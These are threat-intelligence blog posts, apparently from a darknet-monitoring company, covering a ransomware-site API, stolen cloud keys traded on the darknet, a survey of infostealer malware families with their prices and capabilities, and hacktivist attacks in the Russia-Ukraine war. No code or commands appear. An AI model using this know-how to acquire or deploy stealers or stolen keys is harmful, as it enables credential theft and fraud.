Sarah Prime, Director of Product Technology, continues to innovate new products that illuminate critical areas of the darknet. We spoke with Sarah to get the latest on DarkOwl’s new product, Ransomware API.
So Sarah, tell us about this product
Our new product is called Ransomware API, which is an endpoint designed to allow organizations to monitor and have insight into ransomware sites on the darknet.
What made you want to develop this endpoint?
We developed it as a direct response to what we were hearing from our customers. We know that our insight and historical perspective into the darknet is unique, and we wanted to make it easy for people to find this critical information about their vendors or clients.
With this API product, content on these sites – including organization mentions – can now serve as an important risk indicator for a variety of use cases.
Tell me more about these ransomware group sites
The sites available via our new Ransomware API are darknet sites where these groups will publish public announcements, as well as links to downloadable content – often in the form of stolen data. We retain all of the ransomware site content in our archive, as part of our darknet data collection, even after it’s taken down.
As we all know, ransomware as a criminal activity has really skyrocketed in the past few years. Ransomware groups have become significantly more sophisticated and organized from a business perspective, and have created their own underground economy. They commonly use advanced economic strategies such as affiliate networks, third party mediation consultants, and referral programs.
Part of the way groups bolster their clout and status as a reliable enterprise is by establishing a brand, which means they will launch a website just like a corporation might on the regular internet. They even gain income via ad revenue like any other website. Except, this is taking place in a criminal setting.
What would a company being mentioned on one of these sites mean?
It depends, but the vast majority of the time it would mean that the company has been successfully compromised as the result of a ransomware attack. There are certain exceptions, such as when a company has been targeted and the ransomware group posted a description of that company and it included a partner organization, for example. However, in that scenario, it would be important for that company to know that its partner had suffered a ransomware attack so that it could deploy appropriate cautionary and defensive measures within its own network.
After it has been targeted and compromised as the result of a ransomware attack, the context in which a company is mentioned can vary from case to case. In some circumstances, a RaaS group may publish a post stating that they have compromised company X, and If that company doesn’t pay up, they will publish all of their data on their website for free to whomever wants to download it. In other cases, they will sell off portions of a company’s data for profit, regardless of whether they had paid their ransom or not.
Image A: Screen capture of a ransomware group posting on the darknet that describes the data obtained from one of their victims
Image B: Screen capture of the same ransomware posting as Image A, as indexed within DarkOwl’s database and seen in Vision UI
If the attack has already happened, why does it matter?
It’s critical to know whether your customers or companies in your supply chain have been subjected to a ransomware attack. If one of your third-party vendors is compromised by a ransomware attack, you don’t want to wait until they’re able to officially inform you to find out – especially considering that their networks may still be inaccessible to them. They may not even be able to effectively inform their partners/clients right away. Similarly, a services provider can monitor their customer base for these attacks, both to assist in their reaction and also to be aware of the risk associated with the attack. Insurance underwriters and reinsurance companies have a need to monitor on an ongoing basis.
In cases where a company has not backed up their data, the records publicized by the criminals can be a means of understanding exactly what data was lost, what is being sold, and what missing records the group may be holding on to.
Who are the most prolific ransomware actors?
The LockBit 2.0 (LB2) ransomware group has the highest number of victims since the start of 2022. In our analysis of ransomware activity since the invasion of Ukraine in early May, we determined LB2 had successfully encrypted over 280 victims, averaging 4.5 victims per day.
CL0P and CONTI were the two next groups with the highest number of victims, but according to open source reporting, CONTI may be in the process of shutting down their operations due to the impact of Russian sanctions, or simply rebranding to lessen public pressure on the group. We’ve also witnessed AlphaV and HiveLeak demonstrate exponential growth in victim announcements in recent weeks.
How does DarkOwl track these groups?
What’s interesting is that ransomware is a uniquely darknet-based phenomenon. By that I mean, its origins are on the darknet, its perpetrators primarily reside on the darknet, and its economy is hosted on the darknet. We are also increasingly seeing RaaS groups opening splinter or parallel operations on darknet-adjacent networks, such as on chat platforms like Telegram.
We’ve been in the darknet space for a long enough time that our analysts have naturally been keeping tabs and in some cases gotten quite close to these networks, so that we’ve been able to maintain access. We’re also deeply familiar with the way in which these groups operate and are able to predict when new groups are gaining prominence, when popular groups are rebranding, when they might be launching new sites, and so forth.
Is there a particular use case that you think Ransomware API is a good fit for?
Any company that has a substantial vendor portfolio and is concerned about supply chain risk. It could also provide an important datapoint for cyber insurance underwriters who need to assess a company’s historical risk. In fact, because ransomware groups will often remove or delete their posts after a certain amount of time, this tool is one of the few – if not the only – that can provide an accurate picture of whether or not a company has been subject of a ransomware attack.
How is this different from our other API products?
This product provides information regarding a very specific use case that customers can use to build whatever they want, including monitoring functionality, auditing services, underwriting assessments, compliance tools, etc. While this is also possible with our other APIs, the targeted scope of this data makes it one of our more streamlined and scalable products.
What else makes this product special?
This product is built on dynamic data sources; as ransomware groups evolve, so does our data coverage. We can also track specialty groups upon request, so it will be interesting to see what kind of growth there is in coming months as we continually add new ransomware sites to our collection.
Anything to look forward to from DarkOwl team? What is the product team excited about?
Yes! We always have a lot going on, but the biggest thing on the horizon from the product team is the development of a new DARKINT scoring model. It’s showing a lot of early promise in identifying heightened risk, making it an even more comprehensive measure of an organization’s darknet exposure. This is critical for risk assessment, risk monitoring and rating efforts.
Where can people learn more?
To stay aware of ransomware group activity, I recommend keeping up with the research that our analysts publish regularly. Their latest piece, which is fascinating coverage RaaS group activity since the invasion of Ukraine, can be found here.
To learn more about Ransomware API, please reach out to schedule a demo with our sales and product teams.
In this blog, we review how sensitive, server-side access credential data – such as AWS private/secret keys, Django secret keys, and API tokens – are captured, circulated, and sold across darknet marketplaces and criminal communities.
Darknet Background
The darknet, which is also referred to as the dark web, is a segment of the internet that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade. Adjacent to the darknet is the deep web and instant chat platforms that play an increasing critical role in facilitating this illicit information availability. Pseudo-anonymous discussion forums and vendor marketplaces hosted on the deep web along with Telegram private and public channels provide additional platforms by which threat actors communicate and circulate sensitive and stolen credential data.
There are multiple types of underground criminal communities that are directly involved in the circulation of stolen credential data. The threat actors from these communities are often categorized as:
Initial Access Brokers: specialize in providing direct access to organizational networks to conduct offensive cyber campaigns. Access is offered for sale on darknet malware discussion forums and exploit marketplaces.
Database Brokers: specialize in exfiltration of large datasets from compromised organizations. Databases are traded and sold on darknet marketplaces and Telegram channels.
Nation-State Sponsored / Cyber Criminal Gangs: these groups are intent on conducting cyber operational campaigns in fulfillment of geopolitical or military initiatives, cyber espionage, and/or information operations. Some gangs are also financially motivated and will extort the victim for financial payments once keys have been leverage for access and theft of sensitive data.
There is also the odd and less publicized ‘hacker skid’ or hobbyist hackers that will scour the darkest corners of the Internet for server-side credential data for simply the psychological thrill of the hunt. These threat actors do not have direct intent for monetary gain, nor even probable use, but seek to feed their egos and increase their personal clout by stealing keys and communicating their various levels of illegal access to high-profile criminal groups and hacking enthusiast communities and chat servers.
Critical Credential Data
This blog is focused on server-side credential data for development and cloud-based server assets. Credential data is also referred to as username/email-address and password combinations, which will not be discussed here.
There are several types of “keys” that threat actors are interested in obtaining:
Amazon Web Service (AWS) Key Management Service (AWS KMS) Access Keys: ‘poweruser’ and administrator encryption keys for the managing Amazon-hosted services.
AWS Identity Access Management (IAM) keys: consist of long-term credentials users will use to sign programmatic requests to AWS Command Line Interface (CLI) or AWS API.
Azure Keys & Secrets: Credential data stored inside Azure Key Vault (KV). Data includes database connection strings, account keys, passwords, and JSON Web keys.
Django SECRET_KEYs: secret key for a particular Django installation that is used to provide cryptographic signing.
Google Key Management System (KMS) Customer Managed Encryption Keys (CMEK): project-id’s and private keys for service accounts on the Google Cloud Platform (GCP)
API Keys:keys required for any number of application programming interfaces
Unfortunately, the threat actors do not always delineate types of keys they’ve obtained or are offering. Many times the threat actor simply advertises the platform and the word “key” in the forum post or marketplace advertisement.
Key Compromise
Commercial application developers have been guilty of copying and pasting keys in organizational Github repositories that are publicly accessible via automated web scrapers. Malicious threat actors actively hunt for such keys across software repositories and unprotected s3 buckets and then utilize the keys for malicious campaigns or trade in the darknet. Sometimes such exfiltrated data is stored on transient paste sites prior to distribution, that is captured by DarkOwl.
A recent example of a ‘dump’ of secret server keys is demonstrated in the figure below. These were discovered by simply using DarkOwl’s proximity search to find documents where the words ‘AWS’ and ‘key’ are within two words of each other.
Figure 1: Source DarkOwl Vision
Some threat actors offer zero-days on malware-centric Telegram channels and darknet discussion forums that facilitate the scanning of Gitlab and Github. In early 2021, a user on AIO Crime, using the moniker soapceo, offered a 0day for searching private repositories for AWS keys for $10K USD.
Figure 2: Source DarkOwl Vision
Other malicious actors employ malware, such as information stealers (a.k.a. infostealers) to steal session tokens and keys. Infostealers such as Redline, Jester, and Eternity – often installed onto victim devices via malicious email campaigns – covertly log and exfiltrate sensitive data from the victim’s device to cause additional harm.
According to open-sources, information security researchers have identified similar information stealer malware in the wild, such as TeamTNT_AWS_Stealer that specifically targets virtual/cloud platforms to exfiltrate sensitive AWS keys on Kubernetes and Docker clusters adjacent to the compromised container.
DarkOwl identified malware called Laravel Monster that is advertised as an “all-in-one grabber” that exfiltrates AWS keys “and more” offered on a popular Russian-speaking forum. The malware also includes a built-in AWS checker that validates whether the keys harvested are active and live and could be used to compromise the server.
Figure 3: Source DarkOwl Vision
For reference, in early 2022, we observed another example of a “Git Scanner” malware is included from the exploit forum for $4K USD to $8K USD depending on the features of the software. A YouTube video demonstrating the software is also included in the post.
In April 2022,a user posted an offer on Telegram for something called, “INJECTOR V3” and a hacking guide known as “Amazon AWS SMTP Method 2022.”
It’s unclear what the details of this method entail (as we did not purchase it); however, other chatter on Telegram suggests it “cracks” AWS servers, uses the server to carry out malspam email campaigns, e.g. phishing, and may even harvest data while on the server.
Figure 4: Source DarkOwl Vision
Keys on Offer
DarkOwl has observed sensitive credential data and keys on offer across the darknet and adjacent chat platforms known for facilitating cyber-crime. Darknet and deep web forums popular for discussing critical credential data, e.g. keys include many of the malware-specific forums such as XSS. Many times the mention is in relation to “how to exploit” what they’ve discovered on the compromised cloud asset, while others are offered “for sale” in the ACCESS section of the embedded marketplace in the forum.
Darknet threat actors utilize Jabber XMPP and Telegram services in conjunction with their accounts on malware discussion forums to communicate directly with their customers and/or provide more detail about their use of malware they’ve developed or are on offer.
Some threat actors have dedicated “public” Telegram channels where services and digital goods are offered for sale. DarkOwl has observed keys for sale on darknet forum threads and Telegram channels. Many offers on Telegram include offers for keys to simply increase their credibility in the space and encourage customers to do business with them.
Figure 5: Source DarkOwl Vision
While many keys are captured via the methods mentioned above, sensitive SDK API keys are often stolen during organizational cybersecurity incidents, and then circulated by groups on the darknet and in Telegram channels. In summer of 2021, the Electronic Arts (EA)’s FIFA software servers were compromised by a cybercriminal gang, and the data is still in circulation.
Figure 6: Source DarkOwl Vision
Sometimes a discovered or stolen key is utilized to access a cloud or platform panel and the threat actor offers the ‘panel’ for sale. In late 2021, a Telegram market, known as “The Grand Exchange” advertised an Azure panel on offer for sale. The advertisement references a deep web marketplace for the vendor.
Figure 7: Source DarkOwl Vision
Many API keys in circulation on the darknet are offered for free. DarkOwl has observed several recent software API keys offered for free on popular commercial-accounts-trading Telegram channels.
In 2020, a Telegram channel user states they have a Binance API key they obtained via information stealer malware.
In March 2021, an initial access brokers advertised sensitive credential data and cloud access AWS “root” keys for a USA company on a popular darknet malware development forum. The keys were on sale for $80K USD and the threat actor included the revenue estimates for the company and AWS bills to justify the cost of the keys in correlation to the potential ransomware extortion values.
Figure 8: Source DarkOwl Vision
DarkOwl has observed API keys for sale on darknet discussion forums and adjacent Telegram live chat platforms. Both Raidforums and its newest reincarnation, Breached Forums have included such offers on their sites. The figure below is an example of Raidforums user on Telegram offering to sell a Coinbase Pro API key for malicious access. How the API key was obtained is unclear.
Figure 9: Source DarkOwl Vision
DarkOwl has observed threat actors offering sell access to “logs on darknet marketplaces, such as Russian and Genesis. Such logs are obtained via stealer malware variants and include session tokens and keys obtained from victim devices.
Databases of stealer logs that may include API tokens and sessions are also offered for sale and trade on deep web forums such as Breached Forums.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
Overview: Information Stealers (or ‘infostealers’)
In recent months, DarkOwl has observed an increase in the number of posts advertising a specific type of malware known as “information stealers” or simply, ‘infostealers’ by the underground cybercriminal community. Most of the infostealer promotion appears on darknet and deep web malware/hacking forums and are available for sale across many darknet marketplaces.
Information stealers are designed to steal sensitive information from a compromised device. Most information stealers are designed to covertly access the application where data is stored, e.g. internet browser, and gather personal information such as authentication and credential data, crypto wallets, browser session cookies, etc, and remotely transmit the data back to the cybercriminal for conducting additional financially-focused extortion crime.
Infostealers are commonly delivered by social engineering, such as malspam campaigns and phishing emails. Attachments are typically included in the email with a lure, or a legitimate-looking trap encouraging victims to open the attachment and install the malware onto their device. Information stealers are on the rise and promise lucrative business opportunities for cyber criminals.
In this research, our team reviewed some of the most widely proliferated infostealers on offer on the darknet and discovered an elaborate data exfiltration ecosystem, with low-entry cost, providing cybercriminals access to a wealth of personal information without the victim’s knowledge. We also learned many infostealers are offered in alignment with a malware-as-a-service (MaaS) or “stealer-as-a-service” (SaaS) rental model with subscriptions-based access to the malware executables and associated command and control C2 botnets.
Redline
Redline is one of the most popular, widely recommended, and notorious information stealers available on the market. The first advertisement for Redline appeared in March 2020. Redline can be used for exfiltrating credentials, cryptocurrency wallets, browser information, as well as FTP client application data. The stealer also collects information about the victim device, including OS, system hardware, processes, and system language.
According to OSINT security researchers, the stealer can load remote payloads in addition to the SOAP protocol for covert C2 communication. Recent versions of Redline leverage SOAP, or Simple Objects Access Protocol over NET.TCP which helps obfuscate the communication data shared between the victim and the C2 servers. SOAP also facilitates smaller packet sizes, which translates to a smaller malware footprint.
Redline is available on darknet marketplaces like DarkFox for as little as $150 USD for the “lite” version, $200 USD for an advertised “pro” version, or $100 USD for a monthly subscription with restricted access. Other marketplace offers indicate that the Redline team advertise various versions and configurations of their infostealer to support varying levels of threat actor sophistication.
The malware is written in C# and uses a SOAP API to communicate with its C2. Attackers are contacted on Telegram and then can use the C2 panel installed on the victims’ device to use Redline. Redline source code is available on Github with 142 lines of code and built-in commands. (Source: Available Upon Request)
Figure 1: Offer for Redline Stealer for sale on Darkfox Darknet Marketplace
Racoon
According to open sources, Raccoon Stealer, a.k.a Racelar, was first offered for sale in April 2019 and associated with a Telgram user @gr33nl1ght. The Racoon stealer exfiltrates victim login credentials, credit card information, cryptocurrency wallets and browser information. It can also download and execute arbitrary files by command from the C2, operated from Telegram.
DarkOwl has observed advertisements in the darknet for Raccoon offered under the malware-as-a-service model for $75 USD a week or $200 USD per month. Some advertisements on Telegram decrease with longer commitment, e.g. $500 for two months and $499 for four months. The Raccoon stealer executables are available on Github and the source code has been archived in Pastebin.
Despite the success of their operations, in March, the Raccon stealer group announced on a darknet forum they would be suspending operations due to the war in Ukraine and critical team members who are no longer available for key operations.
Figure 2: Raccoonstealer Representative Announcement of Shutdown due to Ukraine-Russia War
Vidar
According to analysts with Cyble, Vidar, also sold as Vidar PRO stealer, was first identified back in 2018. This infostealer variant steals sensitive information such as passwords, banking information, IP addresses, browser history, login credentials and crypto wallets which are sent back to threat actors’ command and control.
The stealer is widely advertised on Telegram and a DarkOwl Vision document captures a Vidar offer on Telegram for $500 USD, but prices on average range from $250 USD to $750 USD for the stealer malware. (Source: DarkOwl Vision)
Vidar is written in C++, and employs Mastadon servers for command and control. An interesting and in-depth analysis of the stealer code can be found on Github details how its stealer infrastructure operates. (Source Redacted but Available Upon Request)
Predator the Thief
Predator the Thief was first offered for sale on a Russian Darknet Forum on June 17, 2018 by a user known as Alexuiop1337. Predator the Thief is more comprehensive than a browser stealer alone and is able to take screenshots of the victim’s desktop in addition to typical exfiltration of credentials, payment data, crypto wallet information stored in the victim’s internet browsers. (Source)
The malware also includes anti-debug techniques, advanced evasion, and anti-analysis tricks for additional sophistication. It is still widely circulated and updated regularly. A Github repository containing the infostealer’s 332 lines of code is still maintained by a user with the same alias as the original post from 2018. (Source Redacted, but Available Upon Request)
The listing is currently offered on darknet forums as well as Telegram channels. The stealer sells for $150 USD, with an option of paying $100 more for the Clipper module allowing buyers to customize crypto wallet stealing options.
Mars
Mars stealer is the most recent version of OSKI stealer and was first seen circulating around July 2021 on a Russian darknet forum. (Source)
During our analysis, we also discovered Instructions for building the Mars’ stealer panel and using the “builder” are available across numerous darknet forums including how to turn off the exclusion for the stealer working in Commonwealth of Independent States (CIS) designated countries. This infostealer is advertised for $160 to $200 USD and is continually under development and improvement complicating Yara rule creation and AV detection.
In early May, users on a darknet forum began circulating a cracked version of the software for use by the community. Many of the forum users warn against using ‘cracked’ versions of the software as there is higher risk of backdoors. We observed that a prominent MarsTeam account which shared some of the original advertisements for the Mars stealer on one popular darknet forum is banned and tagged as a scammer. The ban brings into question the stealer’s legitimacy.
Figure 3: Original post about the Mars Stealer whose Representative has since been banned
Regardless, a GitHub repository containing code for the Mars Stealer is owned by a developer with an impressive collection of various malicious software and other stealers in their repositories, including Loki and Oski stealer as well as Redline. The current version of Mars stealer is using Google Ads to put cloned OpenOffice sites high on search results.
Blackguard
According to open sources, Blackguard first appeared in Russian forums in January 2020 and was advertised “for testing purposes.” The infostealer spent a year circulation before it was advertised for commercial use in 2021. Blackguard steals web browser data like extensions, cryptocurrency wallets, email, messengers, and other sensitive device information that can identify the victim.
Blackguard is sold as a malware-as-service where stolen information is archived into a zip file which is sent back to the C2 server. The source code is developed in .NET and is access is available for $200 USD a month or $700 for a lifetime subscription. (Source)
Acquisition of the stealer is generally limited to exchange with the malware’s representatives directly Telegram and Jabber.
Despite its popularity among cybercriminals and the existence of a cracked version recently in circulation, some dark web forums users are not impressed with this information stealer nor its price tag. Some users recently nominated the Blackguard stealer for the “worst stealer 2020-2022 award” and warn others from using this stealer for legitimate malicious cyber campaigns.
Figure 4: Forum post criticizing Blackguard stealer malware
[Figure Translated]
“The sold software, which is a shame to call a stealer, has already been said a lot. He can officially be nominated for the “Worst Stealer 2020-2022” award Crack taken from the forum where the initial review was posted. It is worth noting that this crack is given “as is”, without fixing holes in the panel. It is categorically not recommended to use it for combat purposes.There is also information that the stealer was so buggy that it fell with exceptions during the crack tests (for example, when getting the av name installed on the machine). These bugs have been fixed by the reverser!”
In other darknet threads, forum users stated that the Blackguard information stealer is “trash”, replete with errors, and requires too much overhead – in the form of persons to operate, especially for the $700 USD price.
Figure 5: Forum post criticizing Blackguard’s lifetime subscription prices
[FIGURE TRANSLATED]
“AHAHAHAHAHAHAHAHAH, $700 sounds more like a rofl than the real price…” That all in all sounds like a big rofl. The author of this software supports the AUE culture and listens to Nurminsky. And now, comrades, answer me one question: how did we come to this. AUE coder. It is 2022. Is this what we deserve?”
The criticisms caused quite a controversy with the stealer representative on the forum confronting many users directly and suggesting they take it up with the moderators in Arbitration.
Jester
Jester is an information stealer that Cyble first noticed in darknet forums in July 2021. It targets the victim’s browser cookies, credentials, email clients, instant messaging applications, crypto wallets, gaming software, VPN and FTP client application data. (Source)
Advertisements on a darknet forum advertise that the stealer-C2 connection is encrypted using the AES-CBC-256 algorithm, with servers located in the tor network, all logs will be redirected to the user’s Telegram bot, and collection occurs in memory instead of on disk to evade detection. Jester is available on RuTor with links to pastebin sites explaining what the stealer does and how much it costs in different languages. The “Builder Jester” malware-as-a-service offering is priced based on length of subscription with $99 USD per month and two “forever” options for $250 USD and another for $999 USD.
Cyble suggested a Github owned by user L1ghtM4n linked to the Jester malware, but further investigation shows that user is linked to a repository called DynamicStealer. DarkOwl has not been able to confirm if the two malware source codes are affiliated; however, some very recent reporting suggests that Jester might be affiliated with the Eternity malware family.
Users promoting Eternity deny the connection, but flaunt that Eternity offers not only a cookie stealer, but a cryptocurrency malware variant, a cryptocurrency address clipboard “clipper”, a DDoS botnet, Worm and Dropper system, as well as a ransomware variant. A new Eternity stealer Tor service claims they successfully exfiltrate a considerable amount of information from the victim including Signal contacts and password manager data on the device like LastPass.
Figure 6: Eternity stealer promotional information provided by the threat actor
Taurus
Taurus Stealer, also referred to as Taurus project is an information stealer that has been observed promoted by the authors of the Predator the Thief on Russian chat forums in early April 2020. It can steal VPN, social media, credentials, cookies, autofill forms, popular cryptocurrency wallets, and the history of Chromium and Gecko based browsers. It collects information on installer software installation and system configuration, sending it back to the attacker to be used for further lateral exploits across the compromised machine.
Like Mars Stealer, the source code will not execute on victims located in the CIS region, suggesting the authors are likely located in the Russia Federation.
A lifetime license to Taurus is available for $100 USD and can be customized for as little as $20 USD extra. One advertisement we observed on Telegram offered a 10% discount on license cost and the first update is available for free.
Both Taurus and Predator the Thief use BitsTransfer in their PowerShell commands; Bits Transfer is short for “Background Intelligent Transfer Service”, part of Microsoft’s Operating System, and is a way for programs to ask Windows to download or upload files from a remote HTTP or SMB file server.
Taurus links to download malicious GitHub repositories whereas Predator The Thief PowerShell works with LNK files after the stealer has sent the log. When BitsTransfer is executed in Taurus, it downloads three separate files from the Taurus Project on Github owned by andrewwilm. Github has since removed the repository.
In late December, the source for Taurus stealer + its builder, were leaked on a popular darknet forum. Earlier this week, a darknet user offered multiple software iterations of both Predator the Thief and Taurus for $4K USD in Monero cryptocurrency – stating the code was “straight from the author’s hands.” This implies that both Predator the Thief and Taurus stealers were most likely coded originally by the same person.
Figure 7: Offer of source code for sale for Predator the Thief and Taurus stealer software
[Figure Translated]
“The original source code of the two projects.
Predator: 3 versions (2.3.1/3.0.1/3.3.4 ) + clipper model. The panel is not included.
Projects are sold as is, without support and updates. Straight from the author’s hands.
The price for all 4k is $XMR only. We can conduct the transaction through the guarantor of this forum.”
Other Information Stealers
While the stealers mentioned above are the most widely circulated and discussed across the information security community and cybercriminals, we also found other less known stealers that are currently active in the underground.
Ginzo
In late April, we found an “as-is” version of source code for a stealer known as “Ginzo” available to download from a popular third-party anonymous data repository. The Ginzo stealer targets Telegram session data when loaded on a victim’s device, along with Internet browser cookie data, desktop files, cryptocurrency wallet data, and Discord tokens.
Open-source reporting suggests that offering the stealer for free to download is a ploy to gain reputation and “get criminals hooked” on using Ginzo’s threat actors command and control servers.
[TRANSLATION]
“Taken in the vastness of the cart, laid out as is. DLL keys that are thrown with the panel have not been checked.”
Figure 8: Source code for Ginzo stealer offered for download
Grim
Another controversial stealer, called “Grim stealer” hosts its own deep web vendor shop and market offering their stealer for sale. The site claims there is a Telegram scammer which is causing the controversy on darknet forums as they are using the malware team’s logo and pulling a classic case of ‘alias hijacking’ to discredit the stealer’s reputation.
Like Eternity, the Grim shop offers their Grim Noid stealer for $110 USD as well as other products such as: a stealer builder for $60 USD, cryptocurrency clipboard “clipper” for $50 USD, a remote access trojan (RAT) for $100 USD, and botnets for the Surface Web and Telegram for $300 USD.
The technical specifications advertised are consistent with other infostealers on the market.
Figure 9: Grim Noid Stealer offered for sale
The market for information stealers is booming on the darknet, with stealer software variants readily available offering high volume data exfiltration, a relatively low-entry cost, and reliable C2 botnet support.
All the stealer families we reviewed advertise a supportive criminal ecosystem, providing cybercriminals steady access to a wealth of digital tokens and personal information that can be abused for subsequent fraud, digital identity theft, and potentially catastrophic critical infrastructure and supply chain attacks.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.
On the 24th of February, after months of failed diplomacy, the existing geopolitical landscape of Russia, Ukraine, NATO, the EU, China, and the myriad of complex international relationships drastically changed. Thousands of Russian troops and equipment crossed over into Ukraine’s sovereign territory and missile strikes of critical infrastructure and historical landmarks sent its people deep into bunkers underneath the cities, while other took up arms to defend their country.
While the kinetic war waged in the physical realm, Ukraine’s Ministry of Digital Transformation turned to the digital realm for assistance. Within days of the invasion, a call across underground forums and chatrooms was placed and hundreds of thousands of volunteers – many who identify with the Anonymous hacktivist collective – answered.
Ukraine’s call for help sparked off the first ever global cyberwar.
Weeks before tanks and soldiers marched on the cities of Ukraine, Russia had already carried out a series of successful cyberattacks against Ukraine, hitting critical infrastructure and financial institutions around the country with at least six unique strains of destructive wiper malware. DarkOwl observed data exfiltrated during some of those attacks surface in the darknet, such as the Free Civilian service on Tor where hundreds of gigabytes of Ukrainian citizens sensitive personal data appeared. Recent reporting confirms Russia’s GRU also carried out a massive cyberattack against Viasat, knocking its customers’ KA-SAT satellite broadband offline an hour before the invasion.
Russia’s pre-invasion attacks against Ukraine pale in comparison to the retaliative cyberattacks launched against Russia by the international hacktivist community over the last 77 days. Since the invasion began, thousands of hacktivists, cybersecurity researchers, pen-testers, and ‘greyhats’ are actively participating in daily campaigns to disrupt Russia’s military offensive and influence the perceptions of the Russian people trapped behind the walls of the iron curtain.
Cyber Warriors Use Their Keyboards and Phones as Weapons in Global Cyberwar
Ukraine’s Ministry of Digital Transformation has played a large roll in mobilizing calls to arms from a digital perspective. The IT Army of Ukraine – a digital army of over 275,000 volunteers that was tasked by The Ministry – targets Russian websites every day for widespread distributed denial of service (DDoS) attacks. The Ministry also coordinated directly with SpaceX on acquiring thousands of Starlink terminals for redundant satellite Internet access and spearheaded public calls to international business leaders and retail suppliers to withdraw from operating in Russia.
Hacktivist cyber cells aligned with the Anonymous collective and pro-Ukrainian criminal cyber threat actors conducted hundreds of direct information operations campaigns against Russia using any and every exploit in their arsenal. To this day, the attacks continue relentlessly despite Russia’s attempts to use geo-fencing and Cloudflare services.
Within the first week of the war, we witnessed credentials for numerous critical Russian government ministries leaked on the deep web; the names, phone numbers and personal assets of Russian oligarchy released to the public; names, passports, and dates of birth for over 120,000 Russian soldiers deployed in Ukraine; internal documentation for Russia’s Police Force, Ministries of Foreign Affairs, and Economy leaked.
Darknet criminal communities split over their national alliances. Pro-Russian ransomware groups watched their affiliates abandon their programs and turn on them. We witnessed multiple groups have the internal documentation, source code, and private chats leaked. Several Tor forums and vendor markets hosted in Russia faced persecution through direct cyberattacks, database leaks, and deanonymization of IP addresses.
Propaganda as a Weapon
In any cyberwar, information is power. Knowing that Moscow would try to frame the war as a justified and a defensive strategic military operation, Anonymous worked immediately to identify facts and combat misinformationn. Videos of the attacks against civilian buildings went viral on social media, YouTube, and Discord. Russian television, radio, streaming services were illegally accessed to share images from Ukraine. Anonymous security specialists from Poland known simply as squad303 spun up their 1920.in service – named after a famous RAF squadron involved in WW2’s Battle of Britain – which allowed strangers to contact to a random Russian citizen via SMS, email, Whatsapp, and Viber using leaked lists of millions of Russian citizens’ personal contact information and social media.
As of the first week in May, the squad303 team announced that over 100 million direct messages had been sent using their service.
Figure 1: Screenshot of squad303’s Russian Citizen Phone Number Contact Service
The Kremlin responded by tightening their control on the public media narrative, shutting down social media platforms like Twitter, Instagram, and Facebook, officially calling their war a “special military operation” and using militarized riot police to enforce a strict ban on all forms of public protest of the invasion.
Western media and independent news sources have been threatened with journalists facing a potential 15-year prison sentence for reporting anything that countered Putin’s narrative of “denazification of Ukraine” and “freeing” its people from imminent nuclear threat from the US and NATO. Russian propaganda outlets began recirculating false claims of US-sponsored bioweapon laboratories and nuclear weapon storage facilities across Ukraine to justify the invasion.
Since the invasion, the Russian Internet Research Agency (IRA)-backed ‘troll army’ is in full force with thousands of bot accounts active across Twitter, Facebook, Discord, and Telegram spinning a different story on the ground in Ukraine. The accounts disseminate elaborate storylines of Ukraine shelling their own citizens and supporting fake videos and doctored media.
QAnon and Russian Disinformation
Deep web and darknet imageboards (or “chans”), historically supportive of the QAnon movement and home of the most outrageous conspiracy theories ever told, have also been supportive of Putin touting his critical international role – like that of former President Trump’s – in ridding the world of its secret Cabal and the greedy desires of the New World Order.
According to research shared by Bellingcat, posts on the imageboards in early March stated Russia capturing Ukraine’s Chernobyl plant was critical to stopping everything “from DNA experiments, adrenochrome, torture, childsex and rape facilities, cloning installations and much more.” Ironically, QAnon Russia – with one of the largest QAnon follower base at over 90,000 users – has a dissenting opinion and refuses to share the propaganda, but instead promotes peace in Ukraine, and a united brotherhood across all nations in the region including Belarus, Russia, and Ukraine.
Anonymous retaliated against these coordinated disinformation efforts by hacking Russia’s Roskozmador information and propaganda agency and its All-Russian State Television and Radio Broadcasting Company (VGTRK) and leaked over 900,000 emails and 360,000 files from across the organizations which detail how television and radio are tightly regulated and programs censored directly by the Kremlin.
In anticipation for Russian propaganda expected to be broadcast on Victory Day on May 9th, Anonymous successfully compromised Russian state television changing nearly every television description during Victory Day ceremonies to read:
“The blood of thousands of Ukrainians and hundreds of their murdered children is on your hands. TV and authorities are lying. No to war.”
Figure 2: Television Program Description from Russian State TV Programming Hack (Source: Anonymous)
Virtual private network (VPN) use in Russia has skyrocketed increasing over 3,000% since mid-February. According to open sources, at least some percentage of curious Russian citizens are bypassing censorship by using VPNs to access international news about Ukraine and social media platforms. As of this week, reports estimated an average of 300,000 downloads of VPN applications occurred every day.
The first fallout in the darknet from the cyberwar was direct attacks against the CONTI ransomware gang shortly after they publicly declared their support for Russia’s invasion. A Ukrainian-based ‘security researcher’ took to Twitter to leak CONTI’s ransomware source code, details of their internal operations, botnet infrastructure, along with private jabber chats and PII from members of the team.
Similar leaks followed for members of the FSB-backed Trickbot group including dossiers of their members.
Several darknet forums, marketplaces, and XMPP chat servers were taken offline, and information leaked in a digital public shaming for each group’s association with Russia.
In March, Kelvinsecurity exploited a simple IDOR vulnerability on the darknet site: DATABASE Market and leaked the contents of the market’s SQL database and deanonymized the server publishing the IP address of their host located in St. Petersburg.
Earlier this month, member of Anonymous known as v0g3lsec hacked a Russian-linked darknet vendor shop and replaced the site’s content with a description of squad303’s information service and link to their surface website.
Figure 3: Tor Service Defacement by v0g3lsec
Network Battalion (nb65) successfully deployed CONTI’s leaked ransomware source code with a modified cipher and has carried out over half a dozen or more attacks against targets across Russia. Their most recent attack involved Qiwi Кошелек Russian payment system, with over 149,000 kiosks and terminals around the country. Earlier this week, the group shared a database containing over 7 million unique credit card numbers and associated PII for Qiwi platform users in Russia.
Critical Infrastructure Attacks
We have not observed a mass disruption of Russia’s critical infrastructure such as gas, power, and water supplies. This is likely because like the US, such systems decentralized and distributed across various districts across the country. However, some limited interruption has been observed during the conflict. In early March, Cyber Partisans utilized industrial control system (ICS) attacks to shutdown trainlines supplying the Russia military in Belarus. Automated ticketing stations were knocked offline and forced the transportation authorities to issue paper tickets causing delays.
